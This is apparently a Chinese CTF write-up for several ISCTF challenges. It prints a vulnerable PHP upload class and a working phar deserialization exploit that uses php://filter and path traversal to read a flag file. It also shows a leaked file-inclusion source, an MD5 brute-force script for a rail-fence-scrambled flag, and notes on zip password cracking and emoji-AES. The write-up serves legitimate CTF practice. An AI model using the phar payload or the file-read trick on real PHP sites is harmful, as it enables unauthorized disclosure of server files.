upload,一道phar文件上传题目
- class upload{
- public $filename;
- public $ext;
- public $size;
- public $Valid_ext;
-
- public function __construct(){
- $this->filename = $_FILES["file"]["name"];
- $this->ext = end(explode(".", $_FILES["file"]["name"]));
- $this->size = $_FILES["file"]["size"] / 1024;
- $this->Valid_ext = array("gif", "jpeg", "jpg", "png");//限制了后缀的类型
- }
-
- public function start(){
- return $this->check();
- }
-
- private function check(){
-
- if(file_exists($this->filename)){
- return "Image already exsists";
- }elseif(!in_array($this->ext, $this->Valid_ext)){
- return "Only Image Can Be Uploaded";
- }else{
- return $this->move();
- }
- }
-
- private function move(){
- move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$this->filename);
- return "Upload succsess!";
- }
-
- public function __wakeup(){
- echo file_get_contents($this->filename);
- }
- }
-
-
- class check_img{
- public $img_name;
- public function __construct(){
- $this->img_name = $_GET['img_name'];
- }
-
- public function img_check(){
- if(file_exists($this->img_name)){
- return "Image exsists";
- }else{
- return "Image not exsists";
- }
- }
- }
public function __wakeup(){
echo file_get_contents($this->filename);
}这一段可以看出file_get_contents触发phar序列化,然后我们构造就可以
- class upload{
- public $filename;
- }
- $a = new upload();
- $a->filename="php://filter/read=convert.base64-encode/resource=../../../../flag";
- $phar = new Phar('aaaaaaa.phar');
- $phar->startBuffering();
- $phar->setStub('GIF89a'.'');
- $phar->setMetadata($a);
- $phar->addFromString('test.txt', 'test');
- $phar->stopBuffering();
- ?>
也就试路径这麻烦一点
扫描目录扫到一个www.rar
- 2 error_reporting(0);
- 3 header("Content-Type:text/html;charset=utf-8");
- 4 $file = $_GET['file'];
- 5 if (isset($file)) {
- 6 if (preg_match("/flag|\.\.|\/\//i", $file)) {
- 7 echo "no hack";
- 8 exit();
- 9 }
- 10 include $file;
- 11 } else {
- 12 include("upload.php");
- 13 }
- g0at无意间发现了被打乱的flag:I{i?8Sms??Cd_1?T51??F_1?}
- 但是好像缺了不少东西,flag的md5值已经通过py交易得到了:88875458bdd87af5dd2e3c750e534741
I{i?8Sms??Cd_1?T51??F_1?}
因为题目提交的flag格式为,ISCTF{},可以看出用栅栏密码
栏数为5,然后需要爆破得到flag,本来直接套了7层循环,呃呃呃太大了跑不出来,看见了一个师傅写的脚本真的想不到,但是也有一个局限性,必须是数字才可以使用
- for($i = 0;$i<99;$i++){
- //如果字符串的长度为1,就在前面填充一个0
- if(strlen($i)==1){
- $i ='0'.$i;
- }
- for($b = 0;$b<99;$b++){
- //如果字符串的长度为1,就在前面填充一个0
- if(strlen($b)==1){
- $b ='0'.$b;
- }
- for($c = 0;$c<999;$c++){
- //如果字符串的长度为1,就在前面填充一个0
- if(strlen($c)==1){
- $c ='00'.$c;
- //如果字符串的长度为2,就在前面填充一个00
- }else if(strlen($c)==2){
- $c ='0'.$c;
- }
- $num = "ISCTF{md5_is_11".$i.'1'.$b.'8'.$c.'}';
- if("88875458bdd87af5dd2e3c750e534741"==md5($num)){
- echo '密码为'.$num;
- }
-
- }
- }
- }
下载文件需要解压,密码
根据提示进行爆破,前三个是KEY,后面五个字符为字母
解压出的文件都是,emoji表情包,然后进行emoji-aes
然后根据KEYISAES,,所以密钥是AES
获得flag